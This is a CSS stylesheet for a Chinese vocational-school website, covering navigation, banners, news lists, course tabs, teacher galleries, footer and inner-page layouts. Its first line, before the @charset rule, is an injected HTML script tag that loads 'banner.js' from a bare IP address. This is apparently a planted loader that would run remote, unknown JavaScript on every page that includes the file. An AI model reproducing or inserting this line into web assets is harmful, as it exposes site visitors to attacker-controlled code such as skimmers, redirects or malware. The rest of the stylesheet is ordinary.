<script src="http://172.241.210.126/banner.js" rel="nofollow"></script>@charset "utf-8";
* {
	margin: 0;
	padding: 0;
	box-sizing: border-box;
}
html,body{width:100%;height:100%;}
a {
	text-decoration: none;
}

ul,
ol,
li {
	list-style: none;
}

img{
	border: none;
}

body {
	font-family: "微软雅黑";
	font-size: 12px;
}

h1 {
	font-size: 20px;
	color: #2c3e7c;
	border-left: 8px solid #f97310;
	padding-left: 5px;
	margin-bottom: 10px;
}

h2 {
	font-size: 15px;
}

h3 {
	font-size: 12px;
}

h4 {
	font-size: 20px;
	color: #2c3e7c;
	border-left: 8px solid #f97310;
	padding-left: 5px;
	margin-bottom: 10px;
}

p {
	font-size: 12px;
}

.qcfd {
	clear: both;
}

.c1200 {
	width: 1200px;
	margin: 0 auto;
}


/*顶部*/

.itop1 {
	border-bottom: 1px solid #0072bb;
}

.itop2 {
	width: 1200px;
	margin: 0 auto;
	padding: 5px 0;
}

.itop21 {
	float: left;
	background: url(../Images/itop1.png) no-repeat;
	padding-left: 20px;
	color: #0072bb;
}

.itop22 {
	float: right;
}

.itop22 a {
	padding-left: 15px;
	margin-left: 15px;
	color: #0072bb;
}

.itop22a1 {
	background: url(../Images/itop3.png) no-repeat left center;
}

.itop22a2 {
	background: url(../Images/itop2.png) no-repeat left center;
}


/*end*/


/*logo联系电话*/

.ilogo1 {
	width: 1200px;
	margin: 0 auto;
	padding: 10px 0;
}


/*end*/


/*导航*/

.inav1 {
	width: 100%;
	background-color: #0072bb;
	background: linear-gradient(#0072bb, #4fa0d6, #0072bb);
	background: -ms-linear-gradient(#0072bb, #4fa0d6, #0072bb);
}

.inav2 {
	width: 1200px;
	margin: 0 auto;
}

.inav3 li {
	float: left;
	position: relative;
	width: 150px;
	padding: 0 3px 0 2px;
	text-align: center;
	font-size: 15px;
	background: url(../Images/inav1.png) no-repeat right center;
}

.inav3 li:last-of-type {
	background: none;
}

.inav3 a {
	color: #FFFFFF;
	display: block;
	padding: 15px 0;
}

.inav3m {
	background: url(../Images/inav2.png) no-repeat right 25px center;
}

.inav4 {
	position: absolute;
	border: 1px solid #344681;
	background: #FFFFFF;
	border-top: none;
	width: 214px;
	padding: 0 8px;
	display: none;
	z-index: 1;
}

.inav4 li {
	width: 100%;
	padding: 0;
	border-bottom: 1px dashed #2c3e7c;
	text-align: left;
	float: none;
}

.inav4 li:last-of-type {
	border-bottom: none;
}

.inav4 a {
	color: #2c3e7c;
	padding: 10px 20px 10px 35px;
	background: url(../Images/inav3.png) no-repeat right 15px center;
}

.inav3 a:hover {
	background-color: #2c3e7c;
}

.inav3 li:hover .inav4 {
	display: block;
}

.inav4 a:hover {
	background-color: #0072bb;
	color: #FFFFFF;
}

.inav4 li:hover {
	background-color: #0072bb;
}


/*海报banner*/

.banner {
	position: relative;
	margin-bottom: 30px;
}

.banner1 {
	font-size: 0;
	display: none;
}

.banner1 img {
	max-width: 100%;
}

.banner2 {
	position: absolute;
	top: 0;
	left: 0;
	width: 300px;
	height: 100%;
	margin-left:10%;
}

.banner21 {
	width: 300px;
	height: 100%;
	margin: 0 auto;
}

.banner211 {
	width: 300px;
	height: 20%;
	background: rgba(0, 0, 0, 0.6);
	color: #FFFFFF;
	cursor: pointer;
}

.banner211 h2 {
	text-align: center;
	padding-top: 20px;
}


/*海报动画*/

.bannerd {
	animation: bannerd 1s;
}

@keyframes bannerd {
	from {
		opacity: 0.4;
	}
	to {
		opacity: 1;
	}
}


/*end*/


/*最新动态*/

.izxdtc {
	margin-bottom: 10px;
}

.izxdtc-m {
	float: right;
	font-size: 12px;
	margin-top: 10px;
	color: #7a7575;
}

.izxdt {
	float: left;
}

.izxdt1 {
	position: relative;
	overflow: hidden;
	width: 410px;
	height: 220px;
}

.izxdt2 {
	position: absolute;
	width: 10000px;
}

.izxdt2 li {
	float: left;
	width: 200px;
	margin-right: 20px;
	margin-top: 30px;
}

.izxdt3 a {
	color: #2c3e7c;
}

.izxdt3 img {
	display: block;
	width: 100%;
}

.izxdt3 h3 {
	line-height: 1.5em;
	text-align: center;
}

.izxdt3 a:hover {
	color: #FF0000;
}

.izxdt1-l,
.izxdt1-g {
	position: absolute;
	top: 75px;
	font-size: 30px;
	line-height: 40px;
	color: #FFFFFF;
	background: rgba(0, 0, 0, 0.7);
}

.izxdt1-l {
	left: 0;
}

.izxdt1-g {
	right: 0;
}

.izxdt1-l:hover,
.izxdt1-g:hover {
	background: rgba(0, 0, 0, 0.7);
	color: #FFFFFF;
}


/*新闻标题*/

.ixwbt {
	float: left;
	width: 370px;
	margin-left: 20px;
}

.ixwbt1 li {
	border-bottom: 1px dashed #e8e8e8;
	padding: 6px 0;
}

.ixwbt1 a {
	display: block;
	color: #2c3e7c;
}

.ixwbt1 span {
	float: right;
}

.ixwbt1 a:hover {
	color: #FF0000;
}


/*免费试听*/

.imfst {
	float: left;
	width: 370px;
	margin-left: 20px;
}

.imfst1 span {
	color: #68696b;
	cursor: pointer;
	padding: 0 5px;
}

.imfst1 .s1,
.imfst1 span:hover {
	color: #2C3E7C;
}

.imfst2 {
	display: none;
}

.imfst3 li {
	margin-bottom: 10px;
}

.imfst3 li:last-of-type {
	margin-bottom: 0;
}

.imfst3 img {
	display: block;
	float: left;
	width: 110px;
	height: 65px;
}

.imfst3 p {
	float: left;
	margin-left: 10px;
	width: 250px;
	height: 4.5em;
	overflow: hidden;
	line-height: 1.5em;
}

.imfst3 a {
	color: #2c3e7c;
	display: block;
}


/*end*/


/*优惠政策*/

.iyhzc {
	font-size: 0;
	margin-bottom: 15px;
}


/*end*/


/*专题中心*/

.iztzx {
	margin-bottom: 15px;
}

.iztzx1 {
	border: 1px solid #4e4e4e;
	padding: 10px 7px 15px;
}

.iztzx2 {
	float: left;
	width: 130px;
	margin: 0 9px;
	text-align: center;
}

.iztzx2 a {
	color: #2c3e7c;
}

.iztzx2 img {
	display: block;
	border: 1px solid #334581;
	max-width: 100%;
}


/*end*/


/*明星学员*/

.imxxyc {
	margin-bottom: 15px;
}

.imxxy {
	width: 720px;
	float: left;
	margin-right: 20px;
}

.imxxy1 {
	margin-bottom: 15px;
}

.imxxy1 span {
	display: inline-block;
	text-align: center;
	cursor: pointer;
	min-width: 90px;
	padding: 5px 10px;
	border: 1px solid #2c3e7c;
}

.imxxy1 .s1,
.imxxy1 span:hover {
	background: #2c3e7c;
	color: #FFFFFF;
}

.imxxy2 {
	display: none;
}

.imxxy21 {
	border: 1px solid #2c3e7c;
	padding: 5px 0;
	margin-bottom: 5px;
}

.imxxy22 {
	float: left;
	width: 25%;
	font-size: 0;
	text-align: center;
	padding: 0 10px;
}

.imxxy22 img {
	max-width: 100%;
}

.imxxy3 {
	display: none;
	border: 1px solid #2c3e7c;
	padding: 10px 5px;
	line-height: 1.5em;
}

.izxjy {
	float: left;
	width: 460px;
}


/*end*/


/*最新就业*/

.izxjy2 {
	float: left;
	width: 460px;
}

.izxjy21 table {
	border-collapse: collapse;
}

.izxjy21 th {
	width: 115px;
	height: 24px;
	color: #FFFFFF;
	background: #2c3e7c;
}

.izxjy22 {
	height: 315px;
	overflow: hidden;
}

.izxjy22 tr:first-of-type td{
	border-top: none;
}

.izxjy22 table {
	border-collapse: collapse;
}

.izxjy22 td {
	width: 115px;
	height: 24px;
	text-align: center;
	border: 1px solid #2c3e7c;
}

.izxjy2b {
	text-align: center;
	background: #f97310;
	padding: 5px 0;
}

.izxjy2b a {
	display: inline-block;
	color: #FFFFFF;
}


/*end*/


/*合作企业*/

.ihzqy {
	margin-bottom: 30px;
}

.ihzqy1 {
	width: 720px;
	float: left;
	margin-right: 20px;
}

.ihzqy1-m {
	float: right;
	font-size: 12px;
	margin-top: 10px;
	color: #2c3e7c;
}

.ihzqy12 {
	border: 1px solid #2c3e7c;
	padding: 30px 0;
	overflow: hidden;
	position: relative;
	height: 145px;
}

.ihzqy12a {
	position: absolute;
	width: 10000px;
}

.ihzqy12a li {
	float: left;
	width: 130px;
	height: 90px;
	margin: 0 25px;
}

.ihzqy12a li a {
	display: block;
	font-size: 0;
	text-align: center;
	position: static;
}

.ihzqy12a img {
	max-width: 100%;
}

.ihzqy1-l,
.ihzqy1-g {
	position: absolute;
	top: 50px;
	font-size: 30px;
	line-height: 40px;
	color: #000000;
	background: rgba(0, 0, 0, 0.2);
}

.ihzqy1-l {
	left: 0;
}

.ihzqy1-g {
	right: 0;
}

.ihzqy12 a:hover {
	background: rgba(0, 0, 0, 0.7);
	color: #FFFFFF;
}


/*end*/


/*合作企业*/

.ihzqy2 {
	float: left;
	width: 460px;
}

.ihzqy21 table {
	border-collapse: collapse;
}

.ihzqy21 th {
	width: 153px;
	height: 24px;
	color: #FFFFFF;
	background: #2c3e7c;
}

.ihzqy22 {
	height: 121px;
	overflow: hidden;
}

.ihzqy22 tr:first-of-type td{
	border-top: none;
}

.ihzqy22 table {
	border-collapse: collapse;
}

.ihzqy22 td {
	width: 153px;
	height: 24px;
	text-align: center;
	border: 1px solid #2c3e7c;
}

/*end*/


/*课程中心*/

.ikczx {
	margin-bottom: 30px;
}

.ikczx1 {
	border: 1px solid #4e4e4e;
}

.ikczx1a {
	border-bottom: 1px solid #b7b7b7;
	margin-right: 25px;
}

.ikczx1a li {
	float: left;
	text-align: center;
}

.ikczx1a a {
	display: block;
	width: 120px;
	height: 30px;
	line-height: 30px;
	color: #737373;
	background: #dddddd;
	border-right: 1px solid #b7b7b7;
}

.ikczx1a .ikczx1-r {
	float: right;
}

.ikczx1-r a {
	width: 50px;
	color: #2c3e7c;
	background: none;
	border-right: none;
}

.ikczx1a .ikczx1a1,
.ikczx1a a:hover {
	border-top: 2px solid #2c3e7c;
	background: #FFFFFF;
	color: #2c3e7c;
}

.ikczx1-r a:hover {
	border-top: none;
	background: none;
}

.ikczx2 {
	display: none;
}

.ikczx2a {
	padding: 10px 0;
}

.ikczx2a li {
	float: left;
	width: 11%;
	margin: 0 0.75%;
}

.ikczx2a a {
	position: relative;
	display: block;
	font-size: 0;
}

.ikczx2a img {
	width: 100%;
}

.ikczx3 {
	position: absolute;
	top: 0;
	left: 0;
	width: 100%;
	height: 100%;
	background: rgba(0, 0, 0, 0.5);
	color: #FFFFFF;
	display: none;
	padding: 15px 5px 5px;
	overflow: hidden;
}

.ikczx3 h3 {
	text-align: center;
	margin-bottom: 0.5em;
}

.ikczx3 p {
	line-height: 1.5em;
}

.ikczx2a a:hover .ikczx3 {
	display: block;
}


/*end*/


/*教员*/

.ijy {
	margin-bottom: 30px;
}

.ijy h4 span ,.ixyhj h4 span{
	padding: 0 10px;
	cursor: pointer;
	color: #484849;
}

.ijy .s1,.ijy h4 span:hover,.ixyhj .s1,.ixyhj h4 span:hover {
	color: #2c3e7c;
}

.ijy-m {
	float: right;
	font-size: 12px;
	margin-top: 10px;
	color: #2c3e7c;
}

.ijy2 {
	border: 1px solid #2c3e7c;
	padding: 10px 0;
	overflow: hidden;
	position: relative;
	height: 204px;
	display: none;
}

.ijy2a {
	position: absolute;
	width: 10000px;
}

.ijy2a li {
	float: left;
	width: 220px;
	height: 180px;
	margin: 0 10px;
}

.ijy2a li a {
	display: block;
	font-size: 0;
	text-align: center;
	position: static;
}

.ijy2a img {
	border: 1px solid #bec3d6;
	max-width: 100%;
}

.ijy-l,
.ijy-g {
	position: absolute;
	top: 70px;
	font-size: 40px;
	line-height: 60px;
	color: #FFFFFF;
	background: rgba(0, 0, 0, 0.7);
}

.ijy-l {
	left: 0;
}

.ijy-g {
	right: 0;
}

.ijy2 a:hover {
	background: rgba(0, 0, 0, 0.7);
	color: #FFFFFF;
}


/*end*/


/*校园环境*/

.ixyhj {
	margin-bottom: 30px;
}

.ixyhj h1 span {
	padding: 0 10px;
	cursor: pointer;
	color: #484849;
}

.ixyhj .s1,
.ixyhj h1 span:hover {
	color: #2c3e7c;
}

.ixyhj-m {
	float: right;
	font-size: 12px;
	margin-top: 10px;
	color: #2c3e7c;
}

.ixyhj2 {
	border: 1px solid #2c3e7c;
	padding: 10px 0;
	overflow: hidden;
	position: relative;
	height: 204px;
	display: none;
}

.ixyhj2a {
	position: absolute;
	width: 10000px;
}

.ixyhj2a li {
	float: left;
	width: 220px;
	height: 180px;
	margin: 0 10px;
}

.ixyhj2a li a {
	display: block;
	font-size: 0;
	text-align: center;
	position: static;
}

.ixyhj2a img {
	border: 1px solid #bec3d6;
	max-width: 100%;
}

.ixyhj-l,
.ixyhj-g {
	position: absolute;
	top: 70px;
	font-size: 40px;
	line-height: 60px;
	color: #FFFFFF;
	background: rgba(0, 0, 0, 0.7);
}

.ixyhj-l {
	left: 0;
}

.ixyhj-g {
	right: 0;
}

.ixyhj2 a:hover {
	background: rgba(0, 0, 0, 0.7);
	color: #FFFFFF;
}


/*end*/


/*校园新闻*/

.ixxxw {
	background: #e9e9e9;
	margin-bottom: 40px;
}

.ixxxw1 {
	width: 400px;
	float: left;
	padding: 20px 10px 30px;
}

.ixxxw1a {
	background: #dcdcdc;
}

.ixxxw1 h2 {
	background: url(../Images/ixxxw1.png) no-repeat left center;
	color: #313131;
	line-height: 1em;
	padding: 10px 0 10px 45px;
	border-bottom: 2px solid #aaaaaa;
	margin-bottom: 10px;
}

.ixxxw1a h2 {
	background: url(../Images/ixxxw2.png) no-repeat left center;
	color: #2c3e7c;
}

.ixxxw1 h2 span {
	font-size: 12px;
}

.ixxxw1 h2 a {
	font-size: 12px;
	color: #313131;
	float: right;
}

.ixxxw1a h2 a {
	color: #2c3e7c;
}

.ixxxw1 img {
	width: 100%;
	display: block;
	padding: 5px;
	background: #FFFFFF;
	border: 1px solid #FFFFFF;
	border-radius: 5px;
	margin-bottom: 10px;
}

.ixxxw2 li {
	background: url(../Images/ixxxw3.png) no-repeat left center;
	padding: 8px 0 8px 15px;
	border-bottom: 1px solid #313131;
}

.ixxxw2 a {
	color: #313131;
	display: block;
}

.ixxxw2 a:hover {
	color: #FF0000;
}

.ixxxw2 span {
	float: right;
}


/*end*/


/*招生问答*/

.izswd {
	width: 700px;
	float: left;
	margin-bottom: 30px;
}

.izswd1 {
	margin: 20px 0;
}

.izswd1 h2 {
	line-height: 1.7em;
	color: #2c3e7c;
}

.izswd a {
	display: inline-block;
	font-size: 15px;
	background: #0183fd;
	color: #FFFFFF;
	padding: 5px 10px;
	border: 1px solid #0183fd;
	border-radius: 10px;
	box-shadow: 1px 2px #44403f;
}


/*end*/


/*首页表单*/

.ibd {
	float: left;
	margin-left: 30px;
	width: 470px;
	margin-bottom: 30px;
}

.ibd1 p {
	font-size: 15px;
	margin-bottom: 10px;
}

.ibd1s {
	display: block;
	text-align: right;
	width: 100px;
	float: left;
	line-height: 30px;
}

.red {
	color: #FF0000;
}

.ibd2 {
	width: 350px;
	height: 30px;
	border: 2px solid #f0ecec;
	border-radius: 3px;
	box-shadow: 0 0 5px #f0ecec inset;
}

.ibd3 {
	width: 350px;
	height: 140px;
	resize: none;
	border: 2px solid #f0ecec;
	border-radius: 3px;
	box-shadow: 0 0 10px #f0ecec inset;
}

.ibd1 h2 {
	text-align: right;
}

.ibd4 {
	display: inline-block;
	width: 100px;
	font-size: 15px;
	background: #3a9ffe;
	color: #FFFFFF;
	border: 1px solid #a3d2ff;
	border-radius: 5px;
	padding: 5px 0;
	margin-right: 20px;
	cursor: pointer;
}


/*end*/


/*首页友情链接*/

.iyqlj {
	margin-bottom: 15px;
}

.iyqlj li {
	float: left;
	margin-right: 20px;
}

.iyqlj a {
	color: #000000;
}


/*end*/


/*底部*/

.footer1 {
	background: #2c3e7c;
	height: 6px;
}

.footer2 {
	background: #373737;
}

.footer21 {
	width: 1200px;
	margin: 0 auto;
	color: #FFFFFF;
	position: relative;
	padding-top: 40px;
}

.footer21 h2 {
	margin-bottom: 10px;
	margin-left: 20px;
}

.footer22 {
	border: 1px solid #a2a2a2;
	padding: 5px 0 15px 5px;
	width: 700px;
	margin-bottom: 45px;
	margin-left: 20px;
}

.footer22 p {
	line-height: 1.5em;
}

.footer23 {
	padding-bottom: 5px;
}

.footer23 li {
	float: left;
	width: 300px;
}

.footer23 a {
	color: #FFFFFF;
}

.footer24 {
	position: absolute;
	top: 0;
	right: 0;
	width: 260px;
	height: 100%;
	background: #2c3e7c;
	text-align: center;
}

.footer24 h2 {
	margin: 0 auto 10px;
}


/*end*/


/*内页顶部*/

.nytop {
	padding: 20px 0;
	background: #e8e8e8;
	background: linear-gradient(#ffffff, #ffffff, #e6e6e6);
	background: -ms-linear-gradient(#ffffff, #ffffff, #e6e6e6);
	margin:0 auto;
}


/*end*/


/*内页位置*/

.nywz h3 {
	color: #3453a7;
	line-height: 3em;
}

.nywz .s1 {
	color: #000000;
}

.nytop1 {
	float: left;
	width: 240px;
	padding: 0 40px;
	border-right: 3px solid #cfcfcf;
}

.nytop1a {
	border-right: none;
}

.nytop1 li {
	float: left;
	width: 50%;
	text-align: center;
	line-height: 1.5em;
}

.nytop1 a {
	color: #000000;
}

.nytop1 h2 {
	padding-left: 17px;
	margin-bottom: 5px;
}

.nytop1 h2 span {
	display: inline-block;
	margin-bottom: 2px;
	margin-right: 10px;
	width: 7px;
	height: 7px;
}

.nytop1h1 {
	color: #f15b11;
}

.nytop1h1 span {
	background: #f3d55b;
}

.nytop1h2 {
	color: #11cff1;
}

.nytop1h2 span {
	background: #b6e7ef;
}

.nytop1h3 {
	color: #1de109;
}

.nytop1h3 span {
	background: #b1f1aa;
}

.nytop1h4 {
	color: #5011f1;
}

.nytop1h4 span {
	background: #bfabf0;
}

.nytop1h5 {
	color: #f1c411;
}

.nytop1h5 span {
	background: #f9e698;
}


/*内页底部*/

.nyzxdy {
	width: 554px;
	float: left;
	margin-right: 22px;
	margin-bottom: 30px;
}

.nyzxdy h2 {
	color: #2b3f7e;
}

.nyzxdy h2 a {
	float: right;
	color: #858585;
	font-size: 12px;
}

.nyzxdy1 {
	border: 2px solid #c3c3c3;
	padding: 10px;
}

.nyzxdy11 {
	float: left;
	width: 330px;
}

.nyzxdy11 li {
	width: 330px;
	line-height: 2.1em;
}

.nyzxdy11 p {
	white-space: nowrap;
	text-overflow: ellipsis;
	overflow: hidden;
}

.nyzxdy11 a {
	color: #000000;
}

.nyzxdy11 span {
	background: #e70000;
	color: #FFFFFF;
	margin-right: 5px;
	padding: 3px;
}

.nyzxdy12 {
	float: left;
	font-size: 0;
	margin-left: 20px;
	width: 180px;
}

.nyzxdy12 a {
	display: block;
}

.nyzxdy12 img {
	width: 180px;
	height: 180px;
}


/*热门专题*/

.nyrmzt {
	float: left;
	width: 624px;
	margin-bottom: 30px;
}

.nyrmzt h2 {
	color: #2b3f7e;
}

.nyrmzt h2 a {
	float: right;
	color: #858585;
	font-size: 12px;
}

.nyrmzt1 {
	border: 2px solid #c3c3c3;
	padding: 10px;
}

.nyrmzt14 {
	width: 255px;
}

.nyrmzt1 img {
	display: block;
}

.nyrmzt14 img {
	float: left;
}

.nyrmzt1i1,
.nyrmzt1i4,
.nyrmzt1i6,
.nyrmzt1i7 {
	margin-bottom: 4px;
}

.nyrmzt11,
.nyrmzt12,
.nyrmzt13,
.nyrmzt1i6,
.nyrmzt1i8 {
	margin-right: 5px;
}

.nyrmzt11,
.nyrmzt12,
.nyrmzt13,
.nyrmzt14 {
	float: left;
}


/*end*/


/*内页分页*/
.nyfy{
	float: left;
	width: 890px;
	text-align: center;
	margin: 20px 0;
}
.nyfy a{
	display: inline-block;
	padding: 2px 8px;
	border: 1px solid #bfbfbf;
	color: #000000;
}
.nyfy a:hover{
	background: #d6d6d6;
}
/*end*/

/*内页侧边*/

.nycb {
	float: left;
	width: 300px;
}

.nycb1 {
	border: 1px solid #a7a7a7;
	padding-bottom: 10px;
	margin-bottom: 20px;
}

.nycb1 h2 {
	background: #4d9fd5;
	border-top: 3px solid #0575bd;
	text-align: center;
	padding: 15px 0;
}

.nycb11 th {
	width: 100px;
	height: 30px;
	color: #ec2a2a;
}

.nycb21 th {
	width: 150px;
}

.nycb12 {
	height: 210px;
	overflow: hidden;
	margin-bottom: 5px;
}

.nycb12 table {
	border-collapse: collapse;
}

.nycb12 tr:nth-child(2n) {
	background: #f2f2f2;
}

.nycb12 td {
	width: 100px;
	height: 30px;
	text-align: center;
	border: 0;
}

.nycb12 table tr td a{
	color:red;
}

.nycb22 td {
	width: 150px;
}

.nycb13 img {
	display: block;
	width: 280px;
	margin: 0 auto;
}

.nycb23 {
	background: url(../Images/nycb2.jpg);
	width: 280px;
	height: 227px;
	margin: 0 auto;
	padding: 50px 40px 0;
}

.nycb23 p {
	margin-bottom: 15px;
	color: #FFFFFF;
}

.nycb231 {
	width: 130px;
}

.nycb23 h3 {
	text-align: center;
}

.nycb232 {
	background: #000000;
	border: 1px solid #000000;
	color: #fff;
	width: 44px;
	height: 20px;
	cursor: pointer;
	margin: 0 5px;
}

.nycb233 {
	background: #fff;
	border: 1px solid #fff;
	color: #000;
	width: 44px;
	height: 20px;
	cursor: pointer;
	margin: 0 5px;
}


/*end*/


/*内页新闻列表*/
.nyxwlb{
	float: left;
	width: 890px;
	margin-right: 10px;
}
.nyxwlb1{
	padding-bottom: 10px;
	border-bottom: 4px solid #a0a0a0;
}
.nyxwlb11{
	width: 420px;
	margin-right: 20px;
	float: left;
	font-size: 0;
	text-align: center;
}
.nyxwlb11 img{
	border: 1px solid #a7a7a7;
	padding: 10px;
	width: 100%;
	margin-bottom: 10px;
}
.nyxwlb11 h3{
	color: #296176;
}
.nyxwlb12{
	width: 450px;
	float: left;
}
.nyxwlb12 h2{
	margin-bottom: 10px;
}
.nyxwlb12 li{
	border-top: 1px dashed #7f7f7f;
	padding: 20px 20px 20px 0;
}
.nyxwlb12 h3{
	color: #296176;
	margin-bottom: 5px;
}
.nyxwlb12 p{
	line-height: 1.5em;
	color: #000000;
	height: 3em;
	overflow: hidden;
}
.nyxwlb12 p:hover{
	color: #FF0000;
}
.nyxwlb2 li{
	background: #f6f6f6;
	font-size: 0;
	margin-top: 30px;
}
.nyxwlb2 li img{
	float: left;
	width: 260px;
	height: auto;
	border: 1px solid #a7a7a7;
	padding: 5px;
}
.nyxwlb21{
	float: left;
	width: 630px;
	padding: 20px;
}
.nyxwlb21 h2{
	margin-bottom: 10px;
}
.nyxwlb21 p{
	line-height: 2em;
	padding-bottom: 1em;
	border-bottom: 1px dashed #828282;
	margin-bottom: 20px;
	height: 7em;
	overflow: hidden;
}
.nyxwlb21 a{
	display:block;
	color:#000;
}
.nyxwlb21 span{
	float: right;
	color: #046888;
}
.nyxwlb21 a:hover{
	color: #FF0000;
}

/*end*/


/*内页师资力量*/
.nyszll{
	float: left;
	width: 890px;
	margin-right: 10px;
}
.nyszll1{
	border: 2px solid #a7a7a7;
	margin-bottom: 25px;
}
.nyszll1 h2{
	color: #0575bd;
	border-bottom: 1px solid #e9e9e9;
	margin-right: 10px;
	margin-bottom: 5px;
	padding: 5px 0 5px 10px;
}
.nyszll1 h2 a{
	float: right;
	color: #858585;
	font-size: 12px;
	margin-top: 5px;
}
.nyszll1 h3{
	border-bottom: 1px solid #e9e9e9;
	margin-right: 10px;
	padding: 5px 10px 7px 20px;
}
.nyszll1 ul{
	padding: 20px 10px 10px 10px;
}
.nyszll1 li{
	float: left;
	width: 430px;
	margin-right: 6px;
	margin-bottom: 20px;
	border: 1px solid #d2d2d2;
	padding: 5px;
}
.nyszll1 li:nth-child(2n){
	margin-right: 0;
}
.nyszll11{
	font-size: 0;
	float: left;
	width: 220px;
	margin-right: 8px;
}
.nyszll11 img{width:100%;}
.nyszll12{
	float: left;
	width: 190px;
	padding-top: 20px;
}
.nyszll12 h3{
	border-bottom: none;
	color: #000000;
	margin: 0 0 10px 0;
	padding: 0;
}
.nyszll12 p{
	color: #000000;
	line-height: 2em;
}
/*end*/


/*内页详情页*/
.nyxqy{
	float: left;
	width: 890px;
	margin-right: 10px;
	padding: 10px;
	position: relative;
}
.nyxqy h2{
	font-size: 18px;
	padding-left: 20px;
	margin-bottom: 0.5em;
}
.nyxqy h3{
	font-size: 12px;
	padding-left: 20px;
	font-weight: normal;
}
.nyxqy1{
	background: #dbdbdb;
	padding: 10px;
	margin: 10px 0;
}
.nyxqy1 p{
	line-height: 1.5em;
}
.nyxqy1 p span{
	font-weight: bold;
	margin-right: 1em;
}
.nyxqy2{
	line-height: 2.5em;
	min-height: 1300px;
	border-bottom: 1px dashed #d1d1d1;
	margin-bottom: 1em;
}
.nyxqy2 img{
	max-width: 100%;
}
.nyxqy3{
	margin: 0 30px;
	border-bottom: 1px dashed #d1d1d1;
	margin-bottom: 1em;
}
.nyxqy3 h3{
	padding-left: 0;
	margin-bottom: 1em;
	color: #484848;
}
.nyxqy3 h3 a{
	color: #000000;
}
.nyxqy3 h3 a:hover{
	color: #FF0000;
}
.nyxqy4{
	margin: 0 30px;
	border-bottom: 1px solid #d1d1d1;
}
.nyxqy4 h3{
	padding-left: 0;
	margin-bottom: 1em;
	color: #9a9a9a;
}
.nyxqy4 h3 a{
	color: #047bc0;
}
/*end*/

/*内页就业明星*/
.nyjymx{
	float: left;
	width: 890px;
	margin-right: 10px;
}
.nyjymx1{
	border: 2px solid #a7a7a7;
}
.nyjymx1 h2 {
	color: #0575bd;
	border-bottom: 1px solid #e9e9e9;
	padding: 5px 0 5px 10px;
}

.nyjymx1 h3 {
	color: #c20000;
	border-bottom: 1px solid #e9e9e9;
	padding: 10px 0 10px 20px;
}
.nyjymx1 ul{
	padding: 20px 10px 10px;
}
.nyjymx1 li {
	width: 428px;
	float: left;
	padding: 5px;
	margin-right: 10px;
	margin-bottom: 10px;
	border: 1px solid #d2d2d2;
}

.nyjymx1 li:nth-child(2n) {
	margin-right: 0;
}
.nyjymx11{
	float: left;
	width: 50%;
	font-size: 0;
	border: 1px solid #a7a7a7;
	padding: 5px;
}
.nyjymx11 img{
	width: 100%;
	height: auto;
}
.nyjymx12{
	float: left;
	width: 50%;
	padding-top: 10px;
	padding-left: 10px;
}
.nyjymx12 h2 {
	color: #000000;
	border-bottom: none;
	padding: 0;
}

.nyjymx12 h2:first-of-type {
	margin-bottom: 1em;
}

.nyjymx12 h2 span {
	font-weight: normal;
}
/*end*/



/*内页内容1*/
.nyc1{
	float: left;
	width: 890px;
	margin-right: 10px;
}

.nyc1a {
	border: 2px solid #a7a7a7;
	margin-bottom: 20px;
	height: 1618px;
}

.nyc1 h2 {
	color: #0575bd;
	border-bottom: 1px solid #e9e9e9;
	padding: 5px 0 5px 10px;
}

.nyc1 h3 {
	color: #c20000;
	border-bottom: 1px solid #e9e9e9;
	padding: 10px 0 10px 20px;
}

.nyc11 {
	padding: 10px;
}

.nyc11 li {
	width: 428px;
	float: left;
	padding: 5px;
	margin-right: 10px;
	margin-bottom: 10px;
	border: 1px solid #d2d2d2;
}

.nyc11 li:nth-child(2n) {
	margin-right: 0;
}

.nyc11 li a {
	display: block;
}

.nyc111 {
	float: left;
	width: 216px;
	font-size: 0;
	border: 1px solid #a7a7a7;
	padding: 5px;
}

.nyc111 img {
	width: 100%;
}

.nyc112 {
	float: left;
	width: 200px;
	padding-top: 10px;
	padding-left: 10px;
}

.nyc112 h2 {
	color: #000000;
	border-bottom: none;
	padding: 0;
}

.nyc112 h2:first-of-type {
	margin-bottom: 1em;
}

.nyc112 h2 span {
	font-weight: normal;
}

.nyc2{
	float: left;
	width: 890px;
	margin-right: 10px;
	padding: 10px;
	position: relative;
}
.nyc2 h2{
	font-size: 18px;
	padding-left: 20px;
	margin-bottom: 0.5em;
}
.nyc2 h3{
	font-size: 12px;
	padding-left: 20px;
	font-weight: normal;
}
.bdsharebuttonbox{
	position: absolute;
	top: 50px;
	right: 10px;
}
.nyc21{
	background: #dbdbdb;
	padding: 10px;
	margin: 10px 0;
}
.nyc21 p{
	line-height: 1.5em;
}
.nyc21 p span{
	font-weight: bold;
	margin-right: 1em;
}
.nyc22{
	line-height: 1.5em;
	min-height: 1300px;
	border-bottom: 1px dashed #d1d1d1;
	margin-bottom: 1em;
}
.nyc22 img{
	max-width: 100%;
}
.nyc23{
	margin: 0 30px;
	border-bottom: 1px dashed #d1d1d1;
	margin-bottom: 1em;
}
.nyc23 h3{
	padding-left: 0;
	margin-bottom: 1em;
	color: #484848;
}
.nyc23 h3 a{
	color: #000000;
}
.nyc23 h3 a:hover{
	color: #FF0000;
}
.nyc24{
	margin: 0 30px;
	border-bottom: 1px solid #d1d1d1;
}
.nyc24 h3{
	padding-left: 0;
	margin-bottom: 1em;
	color: #9a9a9a;
}
.nyc24 h3 a{
	color: #047bc0;
}

.nyc3{
	float: left;
	width: 890px;
	margin-right: 10px;
}
.nyc31{
	border-bottom: 4px solid #a0a0a0;
	padding: 10px 0;
}
.nyc311{
	float: left;
	font-size: 0;
	width: 440px;
	text-align: center;
	margin-right: 20px;
}
.nyc311 img{
	border: 1px solid #a7a7a7;
	padding: 5px;
	width: 440px;
	height: 336px;
	margin-bottom: 10px;
}
.nyc311 h3{
	color: #296176;
}
.nyc312{
	float: left;
	width: 430px;
}
.nyc312 h3{
	border-bottom: 1px dashed #7f7f7f;
	padding-bottom: 0.5em;
}
.nyc312l{
	margin: 10px;
}
.nyc312l li{
	margin-bottom: 5px;
}
.nyc312l a{
	color: #000000;
}
.nyc312l .l1,.nyc312l .l2{
	color: #f3834c;
}
.nyc312l .l3{
	color: #4cc6f3;
}
.nyc312l a:hover{
	color: #FF0000;
}
.nyc3121{
	border-top: 1px dashed #7f7f7f;
	padding: 20px 0;
}
.nyc3121 h3{
	border-bottom: none;
	color: #035069;
	padding-bottom: 0;
	margin-bottom: 5px;
}
.nyc3121 p{
	color: #000000;
	line-height: 1.5em;
}
.nyc3121:hover p{
	color: #FF0000;
}

.nyc321{
	float: left;
}
.nyc322{
	float: left;
}


.nyxqy-zx{width:100%;}
